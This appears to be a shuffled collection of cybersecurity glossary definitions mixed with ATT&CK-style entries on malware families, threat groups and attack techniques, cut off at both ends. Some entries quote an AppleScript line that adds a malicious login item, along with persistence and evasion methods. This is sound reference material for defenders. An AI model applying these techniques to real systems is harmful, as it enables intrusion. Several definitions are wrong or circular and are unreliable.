Login items installed using the Service Management Framework leverage <code>launchd</code>, are not visible in the System Preferences, and can only be removed by the application that created them. Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder. Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.

Adversaries can utilize AppleScript and Native API calls to create a login item to spawn malicious executables. Prior to version 10.5 on macOS, adversaries can add login items by using AppleScript to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items. Adversaries can use a command such as <code>tell application “System Events” to make login item at end with properties /path/to/executable</code>. This command adds the path of the malicious executable to the login item file list located in <code>~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm</code>. Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.

Term: negative risk
Definition: An event or condition that has the potential for causing asset loss and the undesirable consequences or impact from such loss.
Note: The specific causes of asset loss, and for which the consequences of asset loss are assessed, can arise from a variety of conditions and events related to adversity, typically referred to as disruptions, hazards, or threats. Regardless of the specific term used, the basis of asset loss constitutes all forms of intentional, unintentional, accidental, incidental, misuse, abuse, error, weakness, defect, fault, and/or failure events and associated conditions.

Term: firewall
Definition: A system designed to prevent unauthorized access to or from a private network. Firewalls can be implemented in both hardware and software, or a combination of both.

Term: security authorization package
Definition: Documents the results of the security control assessment and provides the authorizing official with essential information needed to make a risk-based decision on whether to authorize operation of an information system or a designated set of common controls. 
Contains: (i) the security plan; (ii) the security assessment report (SAR); and (iii) the plan of action and milestones (POA&M). 
Note: Many departments and agencies may choose to include the risk assessment report (RAR) as part of the security authorization package. Also, many organizations use system security plan in place of the security plan.

Name: SMOKEDHAM
Type: malware
Description: SMOKEDHAM is a Powershell-based .NET backdoor that was first reported in May 2021; it has been used by at least one ransomware-as-a-service affiliate.

Term: Collecting and Communicating Audit Trails
Definition: To define and identify security-relevant events and the data to be collected and communicated as determined by policy, regulation, or risk analysis to support identification of those security-relevant events.

Term: key establishment
Definition: The process that results in the sharing of a key between two or more entities, either by transporting a key from one entity to another (key transport) or generating a key from information shared by the entities (key agreement).

Name: CORALDECK
Type: malware
Description: CORALDECK is an exfiltration tool used by APT37.

Term: risk analysis
Definition: Overall process of risk identification, risk analysis, and risk evaluation.

Term: telecommunications
Definition: The transmission, between or among points specified by the user, of information of the user's choosing, without change in the form or content of the information as sent and received.

Term: Defense Industrial Base
Definition: The Department of Defense, government, and private sector worldwide industrial complex with capabilities to perform research and development and design, produce, and maintain military weapon systems, subsystems, components, or parts to meet military requirements.

Term: message digest
Definition: A digital signature that uniquely identifes data and has the property that changing a single bit in the data will cause a completely different message diges to be generated.

Term: quality management
Definition: Coordinated activities to direct and control an organization with regard to quality.

Term: bit
Definition: A binary digit having a value of zero or one.

Term: cyber incident
Definition: An occurrence that actually or potentially jeopardizes the confidentiality, integrity, or availability of a system or the information the system processes, stores, or transmits or that constitutes a violation or imminent threat of violation of security policies, security procedures, or acceptable use policies.

Term: Integrity protection
Definition: The process of obtaining assurance that data has not been modified since an authentication code or digital signature was created for that data.

Term: cyber incident
Definition: An occurrence that actually or imminently jeopardizes, without lawful authority, the confidentiality, integrity, or availability of information or an information system or constitutes a violation or imminent threat of violation of law, security policies, security procedures, or acceptable use policies.

Term: Third-party testing
Definition: Independent testing by an organization that was not involved in the design and implementation of the object being tested (e.g., a system or device) and is not intended as the eventual user of that object.

Term: authenticate
Definition: A process that provides assurance of the source and integrity of information in communications sessions, messages, documents or stored data.

Term: capability
Definition: A person’s potential to accomplish something.

Term: PRF
Definition: A function that can be used to generate output from a random seed and a data variable such that the output is computationally indistinguishable from truly random output.

Term: scoping considerations
Definition: A part of tailoring guidance providing organizations with specific considerations on the applicability and implementation of security controls in the security control baseline. Areas of consideration include policy/regulatory, technology, physical infrastructure, system component allocation, operational/environmental, public access, scalability, common control, and security objective.

Term: Key-derivation key
Definition: See Key-derivation key.

Term: CE
Definition: See Cryptographic Erase.

Term: portable storage device
Definition: A system component that can be inserted into and removed from a system, and that is used to store data or information (e.g., text, video, audio, and/or image data). Such components are typically implemented on magnetic, optical, or solid-state devices (e.g., floppy disks, compact/digital video disks, flash/thumb drives, external hard disk drives, and flash memory cards/drives that contain nonvolatile memory).

Term: Compromise recovery
Definition: The procedures and processes of restoring a system, device or process that has been compromised back to a secure or trusted state, including destroying compromised keys, replacing compromised keys (as needed), and verifying the secure state of the recovered system.

Term: Bit Length
Definition: The length in bits of a bit string.

Term: Work Role
Definition: A grouping of work for which an individual or team is responsible or accountable.

Name: Tasklist
Type: tool
Description: The Tasklist utility displays a list of applications and services with their Process IDs (PID) for all tasks running on either a local or a remote computer. It is packaged with Windows operating systems and can be executed from the command-line interface.

Term: access control
Definition: The process of granting or denying specific requests: 1) obtain and use information and related information processing services; and 2) enter specific physical facilities (e.g., Federal buildings, military establishments, border crossing entrances).

Term: attribute provider
Definition: The provider of an identity API that provides access to a subscriber’s attributes without necessarily asserting that the subscriber is present to the RP.

Term: identity verification
Definition: A test of a system to prove that it meets all its specified requirements at a particular stage of its development.

Term: party
Definition: An individual (person), organization, device, or process. In this recommendation, there are typically two parties (e.g., Party A and Party B, Alice and Bob) that jointly perform the key-establishment process using a KEM.

Term: Relationship Property
Definition: Indicates whether the supporting concept is necessary for achieving the supported concept within a supportive relationship mapping.

Term: XQuery
Definition: Provides functionality to query an XML document.

Term: security attribute
Definition: An abstraction representing the basic properties or characteristics of an entity with respect to safeguarding information; typically associated with internal data structures (e.g., records, buffers, files) within the information system and used to enable the implementation of access control and flow control policies, reflect special dissemination, handling or distribution instructions, or support other aspects of the information security policy.

Term: base point
Definition: A fixed elliptic curve point that generates the group used for elliptic curve cryptography.

Term: adj-RIB-Out
Definition: Routes that the BGP router will advertise, based on its local policy, to its peers.

Name: Lua
Type: attack-pattern
Description: Adversaries may abuse Lua commands and scripts for execution. Lua is a cross-platform scripting and programming language primarily designed for embedded use in applications. Lua can be executed on the command-line (through the stand-alone lua interpreter), via scripts (<code>.lua</code>), or from Lua-embedded programs (through the <code>struct lua_State</code>).

Lua scripts may be executed by adversaries for malicious purposes. Adversaries may incorporate, abuse, or replace existing Lua interpreters to allow for malicious Lua command execution at runtime.

Term: ID
Definition: A bit string that is associated with a person, device or organization. It may be an identifying name, or may be something more abstract (for example, a string consisting of an Internet Protocol (IP) address).

Term: Known Hosts File
Definition: A file associated with a specific account that contains one or more host keys. Each host key is associated with an SSH server address (IP or hostname) so that the server can be authenticated when a connection is initiated. The user or administrator who makes the first connection to an SSH server is responsible for verifying that the host key presented by that server is the actual key (not a rogue key) before it gets placed in the known hosts file.

Name: Torisma
Type: malware
Description: Torisma is a second stage implant designed for specialized monitoring that has been used by Lazarus Group. Torisma was discovered during an investigation into the 2020 Operation North Star campaign that targeted the defense sector.

Term: <em>TEXTn</em>
Definition: Block of data representing Plaintext n, if encryption state, or Ciphertext n,

Term: Usability
Definition: Extent to which a product can be used by specified users to achieve specified goals with effectiveness, efficiency, and satisfaction in a specified context of use.

Term: Disk-to-Disk Copy
Definition: Copying the contents of media directly to another media.

Term: multi-factor authentication
Definition: An authentication system or an authenticator that requires more than one authentication factor for successful authentication. Multi-factor authentication can be performed using a single authenticator that provides more than one factor or by a combination of authenticators that provide different factors.

Term: threat information
Definition: Any information related to a threat that might help an organization protect itself against a threat or detect the activities of an actor. Major types of threat information include indicators, TTPs, security alerts, threat intelligence reports, and tool configurations.

Term: DDoS
Definition: A denial of service technique that uses numerous hosts to perform the attack.

Term: Archive
Definition: A facility used for long-term key and/or metadata storage.

Term: assessment method
Definition: One of three types of actions (i.e., examine, interview, test) taken by assessors in obtaining evidence during an assessment.

Name: ZLib
Type: malware
Description: ZLib is a full-featured backdoor that was used as a second-stage implant during Operation Dust Storm since at least 2014. ZLib is malware and should not be confused with the legitimate compression library from which its name is derived.

Term: Platform
Definition: A computer or hardware device and/or associated operating system, or a virtual environment, on which software can be installed or run. Examples of platforms include Linux™, Microsoft Windows Vista®, and Java™.

Name: Python Startup Hooks
Type: attack-pattern
Description: Adversaries may achieve persistence by leveraging Python’s startup mechanisms, including path configuration (`.pth`) files and the `sitecustomize.py` or `usercustomize.py` modules. These files are automatically processed during the initialization of the Python interpreter, allowing for the execution of arbitrary code whenever Python is invoked.

Path configuration files are designed to extend Python’s module search paths through the use of import statements. If a `.pth` file is placed in Python's `site-packages` or `dist-packages` directories, any lines beginning with `import` will be executed automatically on Python invocation. Similarly, if `sitecustomize.py` or `usercustomize.py` is present in the Python path, these files will be imported during interpreter startup, and any code they contain will be executed.

Adversaries may abuse these mechanisms to establish persistence on systems where Python is widely used (e.g., for automation or scripting in production environments).

Term: memorized secret
Definition: A string of characters (letters, numbers and other symbols) that is used to authenticate an identity, to verify access authorization or to derive cryptographic keys.

Name: Prestige
Type: malware
Description: Prestige ransomware has been used by Sandworm Team since at least March 2022, including against transportation and related logistics industries in Ukraine and Poland in October 2022.

Name: Relocate Malware
Type: attack-pattern
Description: Once a payload is delivered, adversaries may reproduce copies of the same malware on the victim system to remove evidence of their presence and/or avoid defenses. Copying malware payloads to new locations may also be combined with File Deletion to cleanup older artifacts.

Relocating malware may be a part of many actions intended to evade defenses. For example, adversaries may copy and rename payloads to better blend into the local environment (i.e., Match Legitimate Resource Name or Location). Payloads may also be repositioned to target File/Path Exclusions as well as specific locations associated with establishing Persistence.

Relocating malicious payloads may also hinder defensive analysis, especially to separate these payloads from earlier events (such as User Execution and Phishing) that may have generated alerts or otherwise drawn attention from defenders. Moving payloads into target directories does not alter the Creation timestamp, thereby evading detection logic reliant on modifications to this artifact (i.e., Timestomp).

Term: algorithmic optimization
Definition: The application of mathematical formulae to calculate the aggregate cost-benefit to the enterprise, given the estimated costs, in a purely mechanical approach.

Name: Backdoor.Oldrea
Type: malware
Description: Backdoor.Oldrea is a modular backdoor that used by Dragonfly against energy companies since at least 2013. Backdoor.Oldrea was distributed via supply chain compromise, and included specialized modules to enumerate and map ICS-specific systems, processes, and protocols.

Term: control baseline
Definition: Formally approved version of a configuration item, regardless of media, formally designated and fixed at a specific time during the configuration item's life cycle. 
Note: The engineering process generates many artifacts that are maintained as a baseline over the course of the engineering effort and after its completion. The configuration control processes of the engineering effort manage baselined artifacts. Examples include stakeholder requirements baseline, system requirements baseline, architecture/design baseline, and configuration baseline.

Term: untrusted party
Definition: A party that cannot be expected to keep sensitive data safe or refrain from disclosing it to others.

Term: Kerberos
Definition: A widely used authentication protocol developed at MIT. In “classic” Kerberos, users share a secret password with a Key Distribution Center (KDC). The user (Alice) who wishes to communicate with another user (Bob) authenticates to the KDC and the KDC furnishes a “ticket” to use to authenticate with Bob.
See SP 800-63C Section 11.2 for more information.

Name: POORAIM
Type: malware
Description: POORAIM is a backdoor used by APT37 in campaigns since at least 2014.

Term: UPN
Definition: In Windows Active Directory, this is the name of a system user in email address format, i.e., a concatenation of username, the “@” symbol, and domain name.

Term: Monobit Test
Definition: The purpose of this test is to determine whether the number of ones and zeros in a sequence are approximately the same as would be expected for a truly random sequence.

Name: Steal Application Access Token
Type: attack-pattern
Description: Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS). Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment.

For example, in Kubernetes environments, processes running inside a container may communicate with the Kubernetes API server using service account tokens. If a container is compromised, an adversary may be able to steal the container’s token and thereby gain access to Kubernetes API commands. 

Similarly, instances within continuous-development / continuous-integration (CI/CD) pipelines will often use API tokens to authenticate to other services for testing and deployment. If these pipelines are compromised, adversaries may be able to steal these tokens and leverage their privileges. 

In Azure, an adversary who compromises a resource with an attached Managed Identity, such as an Azure VM, can request short-lived tokens through the Azure Instance Metadata Service (IMDS). These tokens can then facilitate unauthorized actions or further access to other Azure services, bypassing typical credential-based authentication.

Token theft can also occur through social engineering, in which case user action may be required to grant access. OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow. An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. 
 
Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls. Then, they can send a Spearphishing Link to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through Application Access Token.

Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens, allowing them to obtain new access tokens without prompting the user.

Term: hash value/result
Definition: The result of applying a hash function to a message

Term: split tunneling
Definition: The process of allowing a remote user or device to establish a non-remote connection with a system and simultaneously communicate via some other connection to a resource in an external network. This method of network access enables a user to access remote devices (e.g., a networked printer) at the same time as accessing uncontrolled networks.

Term: internal network
Definition: A network where the establishment, maintenance, and provisioning of security controls are under the direct control of organizational employees or contractors, or the cryptographic encapsulation or similar security technology implemented between organization-controlled endpoints provides the same effect (with regard to confidentiality and integrity). An internal network is typically organization-owned yet may be organization-controlled while not being organization-owned.

Term: COTS
Definition: Software and hardware that already exists and is available from commercial sources. It is also referred to as off-the-shelf.

Term: inheritance
Definition: See security control inheritance.

Term: Secure Hash Algorithm 256
Definition: A hash algorithm that can be used to generate digests of messages. The digests are used to detect whether messages have been changed since the digests were generated.

Term: nonce
Definition: A time-varying value that has – at most – a negligible chance of repeating; for example, a random value that is generated anew for each use, a timestamp, a sequence number, or some combination of these.

Name: Client Configurations
Type: attack-pattern
Description: Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.

Adversaries may gather this information in various ways, such as direct collection actions via Active Scanning (ex: listening ports, server banners, user agent strings) or Phishing for Information. Adversaries may also compromise sites then include malicious content designed to collect host information from visitors. Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: Search Open Websites/Domains or Search Open Technical Databases), establishing operational resources (ex: Develop Capabilities or Obtain Capabilities), and/or initial access (ex: Supply Chain Compromise or External Remote Services).

Term: IC
Definition: The term 'intelligence community' refers to the following agencies or organizations:
(i) The Central Intelligence Agency (CIA);
(ii)The National Security Agency (NSA);
(iii) The Defense Intelligence Agency (DIA);
(iv) The offices within the Department of Defense for the collection of specialized national foreign intelligence through reconnaissance programs;
(v) The Bureau of Intelligence and Research of the Department of State;
(vi) The intelligence elements of the Army, Navy, Air Force, and Marine Corps, the Federal Bureau of Investigation (FBI), the Department of the Treasury, and the Department of Energy; and
(vii) The staff elements of the Director of Central Intelligence.

Term: multi-factor authentication
Definition: Authentication using two or more factors to achieve authentication. Factors include: (i) something you know (e.g., password/personal identification number [PIN]); (ii) something you have (e.g., cryptographic identification device, token); or (iii) something you are (e.g., biometric).

Term: authenticate
Definition: The process a VPN uses to limit access to protected services by forcing users to identify themselves.

Term: domain
Definition: Set of assets and resources subject to a common security policy.

Term: availability
Definition: Property of being accessible and usable on demand by an authorized entity.

Name: HAPPYWORK
Type: malware
Description: HAPPYWORK is a downloader used by APT37 to target South Korean government and financial victims in November 2016.

Name: Havij
Type: tool
Description: Havij is an automatic SQL Injection tool distributed by the Iranian ITSecTeam security company. Havij has been used by penetration testers and adversaries.

Term: attribute validation
Definition: The process of evaluating a system or component during or at the end of the development process to determine whether it satisfies specified requirements (INCOSE).

Term: Legacy Environment
Definition: A Custom environment containing older systems or applications that may need to be secured to meet today’s threats, but often use older, less secure communication mechanisms and need to be able to communicate with other systems.

Term: security function
Definition: Cryptographic algorithms, together with modes of operation (if appropriate); for example, block cipher algorithms, digital signature algorithms, asymmetric key-establishment algorithms, message authentication codes, hash functions, or random bit generators. See FIPS 140.6

Term: Extended Validation Certificate
Definition: A certificate used for HTTPS websites and software that includes identity information that has been subjected to an identity verification process standardized by the CA Browser Forum in its Baseline Requirements that verifies that the identified owner of the website for which the certificate has been issued has exclusive rights to use the domain; exists legally, operationally, and physically; and has authorized the issuance of the certificate.

Term: MacKeyBits
Definition: The bit length of MacKey such that MacKeyBits = 8 ´ MacKeyLen.

Name: Mango
Type: malware
Description: Mango is a first-stage backdoor written in C#/.NET that was used by OilRig during the Juicy Mix campaign. Mango is the successor to Solar and includes additional exfiltration capabilities, the use of native APIs, and added detection evasion code.

Term: hash function
Definition: A function that maps a bit string of arbitrary length to a fixed-length bit string. Approved hash functions satisfy the following properties: 1. One-way – It is computationally infeasible to find any input that maps to any pre-specified output. 2. Collision resistant – It is computationally infeasible to find any two distinct inputs that map to the same output.

Term: IDS
Definition: Software that looks for suspicious activity and alerts administrators.

Term: Key owner
Definition: One or more entities that are authorized to use a symmetric key or the private key of a key pair.

Term: <em>min(x, y)</em>
Definition: The minimum ofx and y. For example, if x < y, then min(x, y) = x.

Term: Authentication Tag
Definition: A cryptographic checksum on data that is designed to reveal both accidental errors and the intentional modification of the data.

Name: GoldMax
Type: malware
Description: GoldMax is a second-stage C2 backdoor written in Go with Windows and Linux variants that are nearly identical in functionality. GoldMax was discovered in early 2021 during the investigation into the SolarWinds Compromise, and has likely been used by APT29 since at least mid-2019. GoldMax uses multiple defense evasion techniques, including avoiding virtualization execution and masking malicious traffic.

Term: media library
Definition: Stores, protects, and controls all authorized versions of media CIs.

Term: Transport Layer Security (TLS)
Definition: An authentication and security protocol widely implemented in browsers and web servers. TLS is defined by RFC 5246. TLS is similar to the older SSL protocol, and TLS 1.0 is effectively SSL version 3.1. NIST SP 800-52, Guidelines for the Selection and Use of Transport Layer Security (TLS) Implementations [NIST SP 800-52], specifies how TLS is to be used in government applications.

Name: Gallmaker
Type: intrusion-set
Description: Gallmaker is a cyberespionage group that has targeted victims in the Middle East and has been active since at least December 2017. The group has mainly targeted victims in the defense, military, and government sectors.

Term: Key-establishment transaction
Definition: An instance of establishing secret keying material using a key-agreement or key-transport transaction.

Term: <em>timestamp_time</em>
Definition: The time provided in a timestamp.

Term: Block Cipher Algorithm
Definition: A family of functions and their inverses that is parameterized by cryptographic keys; the functions map bit strings of a fixed length to bit strings of the same length.

Term: capability
Definition: A combination of mutually reinforcing security and/or privacy controls implemented by technical, physical, and procedural means. Such controls are typically selected to achieve a common information security- or privacy-related purpose.

Term: HMAC
Definition: Keyed-hash Message Authentication Code (as specified in FIPS 198-1).

Name: GravityRAT
Type: malware
Description: GravityRAT is a remote access tool (RAT) and has been in ongoing development since 2016. The actor behind the tool remains unknown, but two usernames have been recovered that link to the author, which are "TheMartian" and "The Invincible." According to the National Computer Emergency Response Team (CERT) of India, the malware has been identified in attacks against organization and entities in India.

Term: credential service provider (CSP)
Definition: See Credential Service Provider.

Term: Permalock
Definition: A security feature that makes the lock status of an area of memory permanent. If the area of memory is locked and permalocked, then that area is permanently locked. If the area of memory is unlocked and permalocked, then that area is permanently unlocked.

Term: Capability, Manage and Assess Risk
Definition: The process of managing risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system, and includes: (i) the conduct of a risk assessment; (ii) the implementation of a risk mitigation strategy; and (iii) employment of techniques and procedures for the continuous monitoring of the security and privacy state of the information system.

Term: system context
Definition: The specific system elements, boundaries, interconnections, interactions, and operational environment that define a system.

Term: DVD
Definition: A Digital Video Disc (DVD) has the same shape and size as a CD, but with a higher density that gives the option for data to be double-sided and/or double-layered.

Term: ROM
Definition: See Read-Only Memory.

Term: media
Definition: Material on which data may be recorded, such as paper, punched cards, film, magnetic tape, magnetic disks, solid state devices, or optical discs.

Term: SCEP
Definition: A protocol defined in an IETF internet draft specification that is used by numerous manufacturers of network equipment and software who are developing simplified means of handling certificates for large-scale implementation to everyday users, as well as referenced in other industry standards.

Term: Distribution
Definition: See Key transport.

Term: destroy
Definition: An action applied to a key or a piece of secret data. After a key or a piece of secret data is destroyed, no information about its value can be recovered.

Name: HELLOKITTY
Type: malware
Description: HELLOKITTY is a ransomware written in C++ that shares similar code structure and functionality with DEATHRANSOM and FIVEHANDS. HELLOKITTY has been used since at least 2020, targets have included a Polish video game developer and a Brazilian electric power company.

Term: behavior
Definition: How a system element, system, or system of systems acts, reacts, and interacts.

Term: derived requirement
Definition: A requirement that is implied or transformed from a higher-level requirement. Note 1: Implied requirements cannot be assessed since they are not contained in any requirement baseline. The decomposition of requirements throughout the engineering process makes the implicit requirements explicit, allowing them to be stated and captured in appropriate baselines and allowing associated assessment criteria to be stated. Note 2: A derived requirement must trace back to at least one higher-level requirement.

Name: StreamEx
Type: malware
Description: StreamEx is a malware family that has been used by Deep Panda since at least 2015. In 2016, it was distributed via legitimate compromised Korean websites.

Term: information security architecture
Definition: An embedded, integral part of the enterprise architecture that describes the structure and behavior of the enterprise security processes, security systems, personnel and organizational subunits, showing their alignment with the enterprise’s mission and strategic plans.

Term: Training
Definition: Informing personnel of their roles and responsibilities within a particular IT plan and teaching them skills related to those roles and responsibilities.

Name: Local Groups
Type: attack-pattern
Description: Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

Commands such as <code>net localgroup</code> of the Net utility, <code>dscl . -list /Groups</code> on macOS, and <code>groups</code> on Linux can list local groups.

Term: CKMS
Definition: A Cryptographic Key Management System that conforms to the requirements of [NIST SP 800-130].

Term: Entropy
Definition: A measure of the disorder, randomness, or variability in a closed system; see SP 800-90B.

Term: <em>MacTagV, (MacTagU)</em>
Definition: The MacTag generated by party V (or party U, respectively). Each is a byte string.

Term: availability
Definition: As defined in FISMA, the term 'availability' means ensuring timely and reliable access to and use of information.

Term: Gaussian mechanism
Definition: An algorithmic primitive for differential privacy that adds random noise sampled from the Gaussian distribution to the output of a query.

Name: 2015 Ukraine Electric Power Attack
Type: campaign
Description: 2015 Ukraine Electric Power Attack was a Sandworm Team campaign during which they used BlackEnergy (specifically BlackEnergy3) and KillDisk to target and disrupt transmission and distribution substations within the Ukrainian power grid. This campaign was the first major public attack conducted against the Ukrainian power grid by Sandworm Team.

Term: Security Association (SA)
Definition: A set of values that define the features and protections applied to a connection.

Term: agreement
Definition: Mutual acknowledgement of terms and conditions under which a working relationship is conducted, or goods are transferred between parties. EXAMPLE: contract, memorandum, or agreement

Name: DNS/Passive DNS
Type: attack-pattern
Description: Adversaries may search DNS data for information about victims that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts.

Adversaries may search DNS data to gather actionable information. Threat actors can query nameservers for a target organization directly, or search through centralized repositories of logged DNS query responses (known as passive DNS). Adversaries may also seek and target DNS misconfigurations/leaks that reveal information about internal networks. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: Search Victim-Owned Websites or Search Open Websites/Domains), establishing operational resources (ex: Acquire Infrastructure or Compromise Infrastructure), and/or initial access (ex: External Remote Services or Trusted Relationship).

Term: key
Definition: The parameter of the block cipher that determines the selection of the forward cipher function from the family of permutations.

Term: <em>MSBm(X)</em>
Definition: The bit string consisting of the m most significant bits of the bit string X.

Term: ESN
Definition: A unique 32-bit number programmed into CDMA phones when they are manufactured.

Term: DCS
Definition: In a control system, refers to control achieved by intelligence that is distributed about the process to be controlled, rather than by a centrally located single unit.

Term: hash value/result
Definition: The output of a hash function (e.g., hash(data) = digest). Also known as a message digest, digest or harsh value. The number of cryptographic has functions a processor can calculate in a given time, usually denominated as hashes per second.

Name: Storm-1811
Type: intrusion-set
Description: Storm-1811 is a financially-motivated entity linked to Black Basta ransomware deployment. Storm-1811 is notable for unique phishing and social engineering mechanisms for initial access, such as overloading victim email inboxes with non-malicious spam to prompt a fake "help desk" interaction leading to the deployment of adversary tools and capabilities.

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when properly implemented, provides the services of: 1. origin authentication, 2. data integrity, and 3. signer non-repudiation.

Term: federation transaction
Definition: A specific instance of processing an authentication using a federation process for a specific subscriber by conveying an assertion from an IdP to an RP.

Term: Cyber Security
Definition: The ability to protect or defend the use of cyberspace from cyber attacks.

Term: problem
Definition: Difficulty, uncertainty, or otherwise realized and undesirable event, set of events, condition, or situation that requires investigation and corrective action.

Term: non-repudiation
Definition: Protection against an individual falsely denying having performed a particular action. Provides the capability to determine whether a given individual took a particular action such as creating information, sending a message, approving information, and receiving a message.

Name: SideTwist
Type: malware
Description: SideTwist is a C-based backdoor that has been used by OilRig since at least 2021.

Term: uplink
Definition: Communication that originates from the ground to the satellite.

Term: control baseline
Definition: Hardware, software, and relevant documentation for an information system at a given point in time.

Term: Hardware Asset Management
Definition: See Capability, Hardware Asset Management.

Term: message authentication code (MAC)
Definition: Message Authentication Code.

Term: Human User Interface Capability
Definition: The ability for an IoT device to communicate directly with people.

Term: cleartext
Definition: Data that is input to an encryption process.

Term: <em>LCM(a, b)</em>
Definition: Least Common Multiple of two positive integers a and b. For example, LCM(4, 6) = 12.

Name: PowerExchange
Type: malware
Description: PowerExchange is a PowerShell backdoor that has been used by OilRig since at least 2023 including against government targets in the Middle East.

Term: trustworthiness
Definition: Worthy of being trusted to fulfill whatever critical requirements may be needed for a particular component, subsystem, system, network, application, mission, enterprise, or other entity.  Note: From a privacy perspective, a trustworthy system is a system that meets specific privacy requirements in addition to meeting other critical requirements.

Term: Application Programming Interface (API)
Definition: A system access point or library function that has a well-defined syntax and is accessible from application programs or user code to provide well-defined functionality.

Term: <em>Klen</em>
Definition: The bit length of the block cipher key.

Term: Advanced Persistent Threats
Definition: An adversary with sophisticated levels of expertise and significant resources, allowing it through the use of multiple different attack vectors (e.g., cyber, physical, and deception) to generate opportunities to achieve its objectives, which are typically to establish and extend footholds within the information technology infrastructure of organizations for purposes of continually exfiltrating information and/or to undermine or impede critical aspects of a mission, program, or organization, or place itself in a position to do so in the future; moreover, the advanced persistent threat pursues its objectives repeatedly over an extended period of time, adapting to a defender’s efforts to resist it, and with determination to maintain the level of interaction needed to execute its objectives.

Term: Secure channel
Definition: A MACsec security relationship used to provide security guarantees for frames transmitted from one member of a Connectivity Association (CA) to the others. An SC is supported by a sequence of Secure Associations (SAs) thus allowing the periodic use of fresh keys without terminating the relationship.

Name: MechaFlounder
Type: malware
Description: MechaFlounder is a python-based remote access tool (RAT) that has been used by APT39. The payload uses a combination of actor developed code and code snippets freely available online in development communities.

Term: systems engineering
Definition: Interdisciplinary approach governing the total technical and managerial effort required to transform a set of stakeholder needs, expectations, and constraints into a solution and to support that solution throughout its life.

Term: Deterministic Algorithm
Definition: An algorithm that, given the same inputs, always produces the same outputs.

Term: Fork
Definition: A change to blockchain network’s software (usually the consensus algorithm). The changes may be backwards compatible - see Soft Fork, or the changes may not be backwards compatible - see Hard Fork.

Term: key establishment
Definition: A procedure that results in generating shared keying material among different parties.

Term: Reference Document
Definition: A source document being compared to a Focal Document. Examples include traditional documents, products, services, education materials, and training.

Term: Domain parameter
Definition: A parameter used in conjunction with some public-key algorithms to generate key pairs or to perform cryptographic operations (e.g., to create digital signatures or to establish keying material).

Name: System Checks
Type: attack-pattern
Description: Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from Virtualization/Sandbox Evasion during automated discovery to shape follow-on behaviors.

Specific checks will vary based on the target and/or adversary, but may involve behaviors such as Windows Management Instrumentation, PowerShell, System Information Discovery, and Query Registry to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment. 

Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters addresses, CPU core count, and available memory/drive size. Once executed, malware may also use File and Directory Discovery to check if it was saved in a folder or file with unexpected or even analysis-related naming artifacts such as `malware`, `sample`, or `hash`.

Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions. In applications like VMWare, adversaries can also use a special I/O port to send commands and receive output. 
 
Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative a virtual environment. Adversaries may also query for specific readings from these devices.

Term: Non-local Connection
Definition: A connection to the manufacturing system affording the user access to system resources and system functionality while physically not present.

Name: Modify Authentication Process
Type: attack-pattern
Description: Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using Valid Accounts.

Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.

Term: secret key
Definition: The use of the term “secret” in this context does not imply a classification level, but rather implies the need to protect the key from disclosure.

Name: OilRig
Type: intrusion-set
